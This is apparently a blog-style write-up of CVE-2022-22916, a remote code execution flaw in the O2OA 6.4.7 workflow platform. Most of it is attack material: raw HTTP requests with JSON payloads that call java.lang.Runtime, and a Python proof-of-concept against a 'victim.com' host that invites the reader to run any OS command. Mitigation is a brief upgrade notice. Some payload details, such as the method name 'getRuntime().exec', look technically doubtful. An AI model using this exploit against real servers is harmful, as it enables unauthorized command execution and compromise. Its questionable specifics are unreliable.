In the world of enterprise collaboration software, O2OA is a popular, open-source platform widely used for business process management in China. However, it sometimes finds itself in the spotlight for the wrong reasons. In 2022, security researchers uncovered a serious vulnerability affecting O2OA version 6.4.7, tracked as CVE-2022-22916. This bug allows attackers to remotely execute arbitrary code on the server and potentially gain full control, simply by sending a crafted request to the /x_program_center/jaxrs/invoke endpoint.

In this article, we'll break down CVE-2022-22916 in simple terms, show how the attack works, demonstrate exploiting the vulnerability, and discuss the risk and remediation.

What is O2OA?

O2OA (Official site: https://www.o2oa.net/) is an open-source platform for workflow, document management, and office automation. It's Java-based and used by many small and large organizations.

Impact: Remote attackers can execute arbitrary commands on the server.

This means that without authentication, a hacker can send a HTTP request and run system commands, install malware, steal data, or cause other damage.

How Does the Vulnerability Work?

The bug lies in the /x_program_center/jaxrs/invoke API endpoint. This endpoint is meant for administrative or system-level function calls but doesn't properly validate or sanitize user inputs.

Attackers can send a crafted JSON payload to this endpoint. The vulnerable code will parse and invoke whatever method is specified, including system commands.

Assume the service is running on http://victim.com:8888. The vulnerable endpoint is

POST /x_program_center/jaxrs/invoke HTTP/1.1
Host: victim.com:8888
Content-Type: application/json
Content-Length: xxx

{ ...payload... }

A malicious request aiming to run system commands might look like this

POST /x_program_center/jaxrs/invoke HTTP/1.1
Host: victim.com:8888
Content-Type: application/json

{
    "name": "java.lang.Runtime",
    "method": "getRuntime",
    "parameterTypes": [],
    "parameters": []
}

The above returns a Runtime object, giving the attacker a handle to execute commands. The attacker can then execute arbitrary OS commands like whoami or even download malware:

POST /x_program_center/jaxrs/invoke HTTP/1.1
Host: victim.com:8888
Content-Type: application/json

{
    "name": "java.lang.Runtime",
    "method": "getRuntime().exec",
    "parameterTypes": ["java.lang.String"],
    "parameters": ["whoami"]
}

If successful, the server will actually run the command and reply with the output.

Proof of Concept (PoC) Exploit

Below is a Python script that demonstrates the exploit. Make sure you have Python and the requests library installed.

import requests
import json

target_url = "http://victim.com:8888/x_program_center/jaxrs/invoke"

payload = {
    "name": "java.lang.Runtime",
    "method": "getRuntime().exec",
    "parameterTypes": ["java.lang.String"],
    "parameters": ["whoami"]  # Replace with your command
}

headers = {
    "Content-Type": "application/json"
}

r = requests.post(target_url, headers=headers, data=json.dumps(payload))
print(r.text)

You can replace the parameters entry with any OS command you like.

References

- Original Issue Disclosure (In Chinese)
- CVE Mitre Entry
- O2OA Official Website
- Exploit Database Entry (Exploit-DB)
- GitHub Proof-of-Concept

Mitigation and Fix

Upgrade Immediately  
The O2OA developers released patched versions after the disclosure. If you're running 6.4.7 or below, upgrade to the latest version as soon as possible.

Conclusion

CVE-2022-22916 is a critical RCE bug that threatens any unpatched O2OA server. It's an example of how dangerous unsanitized method invocations can be in Java-based web services. If you use O2OA, update immediately and check your systems for possible compromise.

Security is a moving target—stay updated, stay safe!


*For security researchers: Always get proper authorization before testing systems that aren't yours.*

Timeline

Published on: 02/17/2022 22:15:00 UTC
Last modified on: 02/25/2022 17:50:00 UTC